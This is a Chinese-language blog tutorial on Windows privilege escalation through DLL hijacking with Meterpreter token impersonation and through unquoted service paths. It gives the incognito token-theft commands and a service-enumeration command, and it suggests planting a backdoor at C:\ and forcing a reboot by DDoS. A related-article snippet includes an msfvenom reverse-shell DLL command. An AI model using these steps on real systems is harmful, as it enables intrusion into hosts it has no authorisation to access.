windows----鸡肋提权方式

最新推荐文章于 2024-05-08 13:52:39 发布
最新推荐文章于 2024-05-08 13:52:39 发布
阅读量239 收藏 1
点赞数
分类专栏: 内网渗透挖掘 # 漏洞原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/122159727
版权

windows

前言:

虽然在实战中很少遇到这些提取方式,但是遇到了也是很吃香的,所以写一篇,供大家一起学习。

正文:

DLL劫持+令牌窃取提权:

这个提权方式比较鸡肋,这个需要目标主机的管理员有使用一些特定的软件(比如ftp,远程访问控制和notepad++等等软件),并且还要经常使用它,因为这样当我们劫持的对方的dll的时候才会启动这个是需要对方配合的。说到这个dll,我们就说一下这个DLL。

DLL为动态链接库文件(他的本质实际上是将可执行文件与库文件分离)。在Windows中,许多应用程序并不是一个完整的可执行文件,它们被分割成一些相对独立的动态链接库,即DLL文件,放置于系统中。当我们执行某一个程序时,相应的DLL文件就会被调用。而这个DLL劫持就是我们把程序原有会运行的DLL文件替换成我们的后门木马(要配合免杀技术),或者把我们的后门放在他原有会执行的DLL文件前面,让他先执行,为什么要放前面其实在进程尝试加载一个DLL时没有指定DLL的绝对路径,那么Windows会尝试去按照顺序搜索这些特定目录时下查找这个DLL,只要黑客能够将恶意的DLL放在优先于正常DLL所在的目录,就能先运行我们的后门或木马。如果要查找程序运行了那些DLL文件可以用火绒自带的火绒剑,或者用微软的process explorer检查加载的dll文件。下载地址:Process Explorer - Windows Sysinternals | Microsoft Docs

执行顺序:

1.进程对应的应用程序所在目录(可理解为程序安装目录比如C:ProgramFilesuTorrent); 2.系统目录(即%windir%system32) 3.16位系统目录(即%windir%system) 4.Windows目录(即%windir%) 5.当前目录(运行的某个文件所在目录,比如C:DocumentsandSettingsAdministratorDesktoptest) 6.PATH环境变量中的各个目录;

这个是网上说的,但是现在肯定都会有写变化,如果哪位师傅知道,可以说一下。

现在就实操下:

查看进程

 

我们要找未知文件或者数字签名文件等,才可以劫持。

这里我们进行替换原有DLL文件进行劫持。

一:msfvenom 生成window木马

 

通过webshell上传,然后替换原有文件。

 

 

记住替换的成我们的dll要和对方发的文件名相同。

进行监听,并设置参数。

 

就等对方管理员起用他被我们植入后门的常用软件了。

对方管理员启用软件,收到会话。

 

查看权限,并用令牌窃取提权。

令牌窃取命令(三条):

use incognito

list_tokens -u

impersonate_token "NT AUTHORITY\SYSTEM"

 

 

可以看到为system权限。

不带引号路径提权:

当Windows服务运行时,如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的路径里面包含空格而且还没有双引号来包含的话,那么就会执行前面的文件。

举个例子:

 

可以看到他这里运行进行了双引号处理,而下面一个就没有

 

这个就是window是自带的防护机制。

但是如果没有引号而且又空格的话就会有安全隐患。我们可以通过webshell执行这条命令来查看服务器里面有没有满足这两个条件的。

命令:service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """

 

可以看到本机还是有很多满足条件的。

我们来利用一下。

 

可以看到这个满足了,当计算机重启的时候他就会运行这条系统程序,他的执行顺序是这样的。

c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

这样我们可以上传一个木马或者后面=门,更或者是一条创建管理员账号的命令的program.exe程序到c盘根目录下。或者上传一个macro.exe到c:\program files (x86)\grasssoft目录下。之后就是重启,执行的问题了,要服务器重启方法有很多,ddos等等,

我们只要在kali进行监听就可以了。

我们可以在上传的程序里面写一个可以执行ipconfig(windows)的脚本,并保存为1.txt。

 

package main
import (
        "fmt"
        "io/ioutil"
        "log"
        "os/exec"
)
func main() {
        cmdOutput, err := exec.Command("ipconfig").Output() 
        if err != nil {
                log.Fatal(err)
        }

        err1 := ioutil.WriteFile("1.txt", cmdOutput, 0644)
        if err1 != nil {
                panic(err)
        }

        fmt.Printf("%s", cmdOutput)

}

yggcwhat
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
web权限提升-令牌窃取&烂土豆&dll劫持
m0_61506558的博客
10-20 482
通过中间人攻击,将COM(NT\SYSTEM权限)在第二步挑战应答过程中认证的区块改成自己的区块获取SYSTEM令牌,然后利用msf的模仿令牌功能模仿SYSTEM令牌。dll劫持提权需要特定软件应用的控制权限及启用配合,复杂鸡肋AlwaysInstallElevated提权默认禁用配置,利用成功机会很少(四)不带引号服务路径配合MSF-web当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行文件,并且引用了完整路径,则系统会按字面解释它并执行(如图1)。
权限维持之notepad++
weixin_45794666的博客
02-22 1034
notepad++插件 Notepad++ 插件可用于扩展 Notepad++ 的功能。默认情况下,用户可以在 Notepad++ 中下载已批准的插件列表,但也允许自定义插件,无需任何验证,从而为开发人员提供扩展文本编辑器使用的灵活性。插件具有 DLL 文件的形式,并存储在以下路径中: %PROGRAMFILES%\Notepad++\plugins 应该注意的是,为了加载插件,文件夹和 DLL 需要具有相同的名称。 如: 对于红队操作员来说,不需要从头开始编写恶意插件,当在 notepad++ 中输
提权(概述、水平/垂直越权、windows/linux提权、反弹shell、Linux_Exploit_Suggester、searchsploit)
Pluto.的博客
12-24 5697
文章目录提权一、概述1. 什么是提权?2. 水平越权&垂直越权3. 分类- windows1. 系统漏洞提权1.1 基于windows20031.2 基于windows2008- Linux 提权 一、概述 1. 什么是提权提权即提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限。 2. 水平越权&垂直越权 水平越权:指相同权限下不同的用户可以互相访问; 垂直越权:指使用权限低的用户可以访问到权限较高的用户; 比如:
提权总结
时光凉春衫薄的博客
12-03 1856
提权总结以及各种利用姿势 原创:likechuxinFreeBuf前天 本文章适合正在学习提权的朋友,或者准备学习提权的朋友,大佬就可以绕过了,写的比较基础。我也是一个小白,总结一下提权的姿势和利用,也分享一些自己觉得好用的方法给大家,欢迎大家帮我补充,有什么好用的提权的方法也可以分享一下,大家共同进步。本篇有自己的理解,如果有什么不对的或者不好的地方希望大家不要喷我,但是欢迎帮我指正。...
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
Linux常用六种提权方式
最新发布
qq_59102311的博客
05-08 2754
SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的权限。为可执行文件添加suid权限的目的是简化操作流程,让普通用户也能做一些高权限才能做的的工作。但是如果某些现有的二进制文件和实用程序具有SUID权限的话,就可以在执行时将权限提升为root。原理:SUID提权的原理与Linux进程的UID有关,进程在运行的时候有以下三个UID:(A)Real UID:执行该进程的用户的UID。
提权--windows
weixin_44940180的博客
08-26 705
Windows权限 用户有三种:Users,Administrator,System 提权是将本地拥有administrator权限用户提权到system用户 windows基础提权命令 查看系统信息:systeminfo|findstr /B /C:”OS名称” /C:”OS版本” 主机名:hostname 环境变量:set 查看用户信息:net user 查看服务pid号:tasklist /svc | find “TermService” 查看端口:Netstat -ano | find “1488
Windows提权
qq_46258964的博客
01-10 2805
Windows权限分为四种 user: 普通用户权限 administrator::管理员权限 system 系统权限 TrustedInstaller:Windows中最高权限。有些文件,连System权限也无法修改。 通过getshell拿到权限之后,权限比较低什么事情的干不了, 我们就要提权到administrator或者更高的system权限。 前期可以上传扫描脚本判断出内核漏洞或者系统漏洞,直接利用漏洞提权是最好的方法。 常见的提权信息收集脚本: vulmap, Wes,WindowsVulnSc
Windows提权---DLL注入/不带引号的服务路径/注册表
qq_40012781的博客
07-03 1056
DLL注入提权、不带引号的服务路径提权、注册表提权
提权-win烂土豆&dll劫持&引号路径&服务权限
qi_SJQ_的博客
02-02 1705
以下几种提权方法的适合环境(web用户/本机用户)因方法而不同,有的方法在两种权限下都适用,一般也都是本机权限大于webshell权限。 win 烂土豆提权(MS16-075): 烂土豆(Rotten Potato)提权是一个本地提权,是针对本地用户的,不能用于域用户,webshell环境或本地普通用户环境都可以适用。 过程:msf生成上传烂土豆-执行烂土豆-利用msf窃取模块-窃取 SYSTEM-成功(漏洞编号:CVE-2016-3225 )。 我们是用之前的令牌窃取提权无法成功,因为web.
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2118
记上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
解决win10提权问题,一键提权,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
护卫神mysql提权_护卫神主机大师提权漏洞利用分析
weixin_32534653的博客
01-27 386
*本文原创作者:Freedom,本文属FreeBuf原创奖励计划,未经许可禁止转载0x01 前言护卫神·主机大师支持一键安装网站运行环境(IIS+ASP+ASP.net+PHP5.2-5.6+MySQL+FTP+伪静态+PhpMyAdmin),并可在线开设主机、SQL Server和MySQL;Web方式管理,拥有独立前台和后台面板。支持Windows Server 2008/2012。结合护卫神...
windows系统权限提升
weixin_53639243的博客
04-23 2592
提权方法。
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2398
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
记一次绕过火绒安全提权实战案例
渗透测试研究中心
01-24 1864
0x01 前言朋友发来一个站让帮看下提权,服务器上安装的有护卫神+火绒+安全狗等安全防护软件,看着确实挺唬人,他也试了不少常用提权EXP,结果都失败了,可能是欠缺免杀EXP能力吧,当然也有可能是修复了这些漏洞,抽空给他看了下并写了这篇记录文章。在拿到权限后用中国菜刀连了下,不过好像被拦截了,提示:服务器返回无效或不可识别的响应,以前也多次遇到这种情况,这里只要换成Godzilla就能正常连接了。...
提权_DLL劫持提权
草木
11-23 1717
1.通过火绒剑分析进程 分析进程调用模块,找到可以利用的dll文件,本次试验劫持idmmkb.dll文件 2.MSF生成后门dll木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.61.131 lport=8888 -f dll >C:\Users\Ninja\Desktop\idmmkb.dll 3.上传替换 4.MSF监听 >use exploit/multi/handler >set payload
本地微信DLL劫持提权复现
weixin_46686336的博客
11-11 1671
DLL劫持提权Windows提权
提权的概述
weixin_42478365的博客
03-17 1029
1.计算机中的权限 权限在不同的应用中有着不同的分类,与安全相关的大致上我们可以分为几个权限。 匿名访问权限 来宾权限。 用户权限。 管理员权限。 系统权限 不同的权限对应着的权利各不相同,我们大家电脑常用的权限为用户权限和管理员权限。 2.在什么情况下会用到提权 一般会产生提权的原因都是因为当前权限无法做到某些我们需要做到的事情。例如在普通用户权限会有很多限制,例如无法执行某些程序以及服务。 1.webshell->系统权限 2.数据库权限->系统权限 3.普通用户->系统全息 3.常
JavaWeb GUI代码生成器:Mybatis-plus可视化工具
这款代码生成器旨在简化JavaWeb开发过程中的部分机械化工作,通过可视化的方式帮助开发者快速创建基本的CRUD操作代码,例如实体类、Mapper接口、Service、Controller等。它利用Mybatis-plus的代码生成器功能,并结合...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值